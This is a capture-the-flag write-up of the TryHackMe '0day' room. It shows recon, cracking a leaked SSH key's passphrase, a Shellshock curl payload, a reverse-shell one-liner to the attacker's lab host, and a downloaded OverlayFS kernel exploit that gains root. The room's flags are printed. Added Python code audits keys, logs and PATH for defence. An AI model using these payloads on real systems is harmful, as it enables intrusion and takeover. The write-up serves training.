TryHackMe - 0day - Writeup

Exploit Ubuntu, like a Turtle in a Hurricane

Nmap Scan

root@ip-10-10-103-250:~# nmap -sCV -p- -A 10.10.255.144 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-13 07:40 BST
Nmap scan report for ip-10-10-255-144.eu-west-1.compute.internal (10.10.255.144)
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day
MAC Address: 02:97:C6:48:94:B9 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms ip-10-10-255-144.eu-west-1.compute.internal (10.10.255.144)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1217.32 seconds

Directory Fuzzing

root@ip-10-10-103-250:~# gobuster dir -u http://10.10.255.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.255.144
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     sh,txt,cgi,html,css,js,py,php
[+] Timeout:        10s
===============================================================
2021/06/13 08:06:44 Starting gobuster
===============================================================
/index.html (Status: 200)
/cgi-bin (Status: 301)
/img (Status: 301)
/uploads (Status: 301)
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/backup (Status: 301)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
===============================================================
2021/06/13 08:10:05 Finished
===============================================================
root@ip-10-10-103-250:~# 

Found an SSH private key in the http://10.10.255.144/backup directory:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
...
-----END RSA PRIVATE KEY-----

http://10.10.255.144/robots.txt says:

You really thought it'd be this easy?

The http://10.10.255.144/secret/ directory contains only a turtle image:

<html>
<head>
<title>Turtles?</title>
</head>
<body>
<center><img src="turtle.png"></center>
</body>
</html>

Let's try to use the SSH private key to log in via SSH. The key is passphrase-protected, so first convert it with ssh2john and crack the passphrase with john:

root@ip-10-10-103-250:~# python3 ssh2john.py id_rsa > id_rsa.enc
root@ip-10-10-103-250:~# john id_rsa.enc --wordlist=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (id_rsa)
1g 0:00:00:19 DONE (2021-06-13 08:20) 0.05128g/s 735471p/s 735471c/s 735471C/s *7¡Vamos!
Session completed. 
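The john output above shows why the passphrase fell in 19 seconds: cost 1 is 0 (MD5/AES) and the iteration count is 1, which is what a legacy OpenSSL-encrypted PEM key gives you, so offline guessing runs at wordlist speed (about 735k candidates per second here). The following audit is an added example, not part of the original writeup: it classifies a private key file by storage format and KDF so legacy PEM keys can be found and re-encrypted with a bcrypt work factor (ssh-keygen -p -o -a <rounds>) before one ends up in a web-served backup directory. Both fixtures are constructed; the PEM one reuses only the header lines shown above over a dummy body.

```python
import base64
import struct
from dataclasses import dataclass


@dataclass
class KeyAudit:
    fmt: str        # "pem", "pkcs8", "openssh-v1" or "unknown"
    encrypted: bool
    cipher: str     # "none" when the key is stored in clear
    kdf: str        # how the passphrase is turned into the cipher key
    rounds: int     # KDF work factor (0 = not applicable / unknown)


def _read_string(buf: bytes, off: int):
    """Read one SSH wire-format string: uint32 big-endian length, then bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def audit_private_key(text: str) -> KeyAudit:
    lines = [l.strip() for l in text.strip().splitlines()]
    first = lines[0]
    if first == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            return KeyAudit("unknown", False, "?", "?", 0)
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":           # kdfopts = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
        return KeyAudit("openssh-v1", cipher != b"none", cipher.decode(), kdf.decode(), rounds)
    if first == "-----BEGIN ENCRYPTED PRIVATE KEY-----":
        return KeyAudit("pkcs8", True, "pkcs8", "pkcs8", 0)  # KDF parameters live in the DER body
    if first.startswith("-----BEGIN ") and first.endswith(" PRIVATE KEY-----"):
        headers = {}
        for line in lines[1:]:
            if ":" not in line:
                break                  # headers stop at the blank line before the body
            k, v = line.split(":", 1)
            headers[k.strip()] = v.strip()
        if headers.get("Proc-Type") == "4,ENCRYPTED" and "DEK-Info" in headers:
            # Legacy OpenSSL PEM: cipher key = MD5(passphrase || salt), one iteration.
            return KeyAudit("pem", True, headers["DEK-Info"].split(",", 1)[0], "md5-1round", 1)
        return KeyAudit("pem", False, "none", "none", 0)
    return KeyAudit("unknown", False, "?", "?", 0)


def verdict(a: KeyAudit) -> str:
    if not a.encrypted:
        return "UNENCRYPTED: whoever holds the file holds the key"
    if a.fmt == "pem":
        return "WEAK: legacy PEM, MD5 KDF with 1 iteration; offline guessing runs at wordlist speed"
    if a.kdf == "bcrypt" and a.rounds < 16:
        return f"LOW: bcrypt with {a.rounds} rounds (ssh-keygen default is 16)"
    if a.kdf == "bcrypt":
        return f"OK: bcrypt with {a.rounds} rounds"
    return "UNKNOWN: inspect manually"


# Constructed fixture: the header lines of the key found in /backup above, over a
# dummy base64 body. Only the headers are read, so this is not a usable key.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5QUJDREVGR0hJSktM
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def make_test_openssh_key(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16) -> str:
    """Constructed openssh-key-v1 fixture: real header layout, zero-filled dummy
    key material, so the parser can be exercised without a real private key."""
    kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfopts)
            + struct.pack(">I", 1) + _ssh_string(b"\x00" * 51) + _ssh_string(b"\x00" * 64))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"
```

Run `verdict(audit_private_key(open(path).read()))` over every `id_*` and `*.pem` file in a backup or home directory; anything that comes back WEAK or UNENCRYPTED is a key that a wordlist run like the one above will open.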

The passphrase for the key is letmein, but I didn't have a username to go with it. One thing I missed is the /cgi-bin directory, so I ran nikto against the host.

root@ip-10-10-103-250:~# nikto -h http://10.10.255.144
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.255.144
+ Target Hostname:    ip-10-10-255-144.eu-west-1.compute.internal
+ Target Port:        80
+ Start Time:         2021-06-13 08:43:39 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xbd1 0x5ae57bb9a1192 
+ The anti-clickjacking X-Frame-Options header is not present.
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/index.html: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2021-06-13 08:43:49 (GMT1) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I have previously exploited /cgi-bin/test.cgi in a bug bounty program. Let's try Shellshock and see whether we can execute arbitrary commands through bash remotely.

root@ip-10-10-103-250:~# curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://10.10.255.144/cgi-bin/test.cgi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Holy moly, it's working: we got the output of id. Now let's get a reverse shell through the same code execution.

root@ip-10-10-103-250:~# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.103.250/1234 0>&1' http://10.10.255.144/cgi-bin/test.cgi

We get a shell on our listener on port 1234 and read user.txt from /home/ryan/user.txt.

root@ip-10-10-103-250:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.255.144 36295 received!
bash: cannot set terminal process group (837): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$ whoami
whoami
www-data
www-data@ubuntu:/home/ryan$ cat user.txt
cat user.txt
THM{Sh3llSh0ck_r0ckz}
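Both requests above leave a recognisable trace: the User-Agent starts with a bash function definition, `() { ...; };`, which no browser ever sends. The scanner below is an added example for the defending side, not code from the original writeup; it pulls the Referer and User-Agent fields out of Apache combined-format access log lines and flags that pattern. The log lines are constructed to show how the two requests from this writeup would be recorded, alongside ordinary traffic that must not be flagged.

```python
import re
from collections import Counter
from dataclasses import dataclass

# A bash function definition in an HTTP header is the signature of a
# Shellshock (CVE-2014-6271) probe: "() { ...; }; <command>".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format. Only Referer and User-Agent are logged by
# default, so a payload in any other header is invisible to this scanner.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


@dataclass
class Hit:
    ip: str
    timestamp: str
    path: str
    header: str
    value: str


def is_shellshock_payload(value: str) -> bool:
    """True when a header value carries the bash function-definition prefix."""
    return bool(SHELLSHOCK_RE.search(value))


def scan_access_log(lines):
    """Return one Hit per logged header that matches the Shellshock pattern."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = m.group("req").split(" ")
        path = parts[1] if len(parts) >= 2 else m.group("req")
        for field, name in (("ua", "User-Agent"), ("referer", "Referer")):
            if is_shellshock_payload(m.group(field)):
                hits.append(Hit(m.group("ip"), m.group("ts"), path, name, m.group(field)))
    return hits


def sources(hits):
    """Probe count per client address, for blocking or alert enrichment."""
    return Counter(h.ip for h in hits)


# Constructed sample log: the two requests from this writeup as Apache would
# record them, plus normal browser traffic that must not be flagged.
SAMPLE_LOG = [
    '10.10.103.250 - - [13/Jun/2021:08:50:01 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 200 54 '
    '"-" "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id"',
    '10.10.103.250 - - [13/Jun/2021:08:52:17 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 500 - '
    '"-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.103.250/1234 0>&1"',
    '10.10.10.5 - - [13/Jun/2021:08:53:00 +0100] "GET /index.html HTTP/1.1" 200 3025 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0"',
    '10.10.10.5 - - [13/Jun/2021:08:53:02 +0100] "GET /secret/turtle.png HTTP/1.1" 200 84212 '
    '"http://10.10.255.144/secret/" "Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0"',
]

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.timestamp} {h.ip} {h.path} {h.header}: {h.value}")
    print(dict(sources(found)))
```

The same `is_shellshock_payload` check belongs in front of the CGI handler as well (a WAF rule or a reverse-proxy filter over every request header), because the default log format only records two of the headers an attacker can use. The lasting fix is the patched bash package; the detection is for finding who knocked in the meantime.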

It's time to escalate privileges. Normally I start by checking sudo -l and then cat /etc/crontab, but neither of them helps here. I also checked a few directories such as /opt and /var and found nothing. The machine's short description says "Exploit Ubuntu, like a Turtle in a Hurricane". Interesting? Let's check the kernel version of the target machine with cat /etc/*-release and uname -a.

root@ip-10-10-103-250:/opt/searchsploit/exploits/linux/local# searchsploit Ubuntu 14.04 3.13
[i] Found (#2): /opt/searchsploit/files_exploits.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#2): /opt/searchsploit/files_shellcodes.csv
[i] To remove this message, please edit "/opt/searchsploit/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlay | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlay | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary  | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free   | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Esc | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Priv | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Priv | linux/local/41760.txt
----------------------------------------------------------------------- ---------------------------------

For this kernel version I found an exploit named OverlayFS Privilege Escalation; the code is in /opt/searchsploit/exploits/linux/local/37292.c.

I checked whether gcc and wget are present on the target machine. Then change to the /tmp directory and wget the exploit from your host machine.

www-data@ubuntu:/home/ryan$ which gcc
which gcc
/usr/bin/gcc
www-data@ubuntu:/home/ryan$ cd /tmp 
cd /tmp
www-data@ubuntu:/tmp$ which wget
which wget
/usr/bin/wget
www-data@ubuntu:/tmp$ wget http://10.10.103.250:1337/37292.c
wget http://10.10.103.250:1337/37292.c
--2021-06-13 01:18:12--  http://10.10.103.250:1337/37292.c
Connecting to 10.10.103.250:1337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'

     0K ....                                                  100%  102M=0s

2021-06-13 01:18:12 (102 MB/s) - '37292.c' saved [5119/5119]

I tried to compile it on the target machine, but it failed:

www-data@ubuntu:/tmp$ gcc 37292.c -o rootExploit      
gcc 37292.c -o rootExploit
gcc: error trying to exec 'cc1': execvp: No such file or directory

After a few minutes on Stack Overflow I found that this error is caused by $PATH: the way PATH was set on the target machine was not right, so I changed it to

www-data@ubuntu:/tmp$ echo $PATH
echo $PATH
/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.
www-data@ubuntu:/tmp$ export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin
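The original PATH above ends in `.`, so every command name is also looked up in the current directory; for a service account sitting in /tmp that means any local user who can drop a file there can shadow a system command. The small audit below is an added example, not from the writeup: it flags the PATH entries that allow this (empty entries, `.`, relative paths, duplicates, and optionally world-writable directories) and produces the cleaned value the author exported. The input is the PATH value printed above.

```python
import os


def audit_path(path_value: str, check_fs: bool = False):
    """Return (entry, reason) pairs for PATH entries that let a writable
    directory shadow a system command. With check_fs=True, absolute entries
    are also stat()ed for world-writability (needs the real filesystem)."""
    findings = []
    seen = set()
    for entry in path_value.split(":"):
        if entry == "":
            findings.append((entry, "empty entry: POSIX resolves it as the current directory"))
        elif entry == ".":
            findings.append((entry, "current directory is searched; a writable cwd such as /tmp shadows commands"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry: resolved against whatever the cwd happens to be"))
        elif entry in seen:
            findings.append((entry, "duplicate entry"))
        elif check_fs and os.path.isdir(entry):
            mode = os.stat(entry).st_mode
            if mode & 0o002 and not mode & 0o1000:
                findings.append((entry, "world-writable directory without sticky bit"))
        seen.add(entry)
    return findings


def sanitize_path(path_value: str) -> str:
    """Keep only absolute, deduplicated entries, in their original order.
    World-writable directories are reported by audit_path but not dropped,
    because removing a real system path is a decision for a human."""
    kept = []
    for entry in path_value.split(":"):
        if entry.startswith("/") and entry not in kept:
            kept.append(entry)
    return ":".join(kept)


# The PATH printed by the www-data shell above.
TARGET_PATH = "/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:."

if __name__ == "__main__":
    for entry, reason in audit_path(TARGET_PATH):
        print(f"{entry!r}: {reason}")
    print("export PATH=" + sanitize_path(TARGET_PATH))
```

For a live check of the account you are running as, call `audit_path(os.environ["PATH"], check_fs=True)`; the fixed value for this machine is the one the author exported.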

After compiling and running the exploit we get root, and the root flag as well.

www-data@ubuntu:/tmp$ gcc 37292.c -o root_exploit && ./root_exploit
gcc 37292.c -o root_exploit && ./root_exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
THM{g00d_j0b_0day_is_Pleased}

Thanks for reading

Room link: 0day

Written on June 13, 2021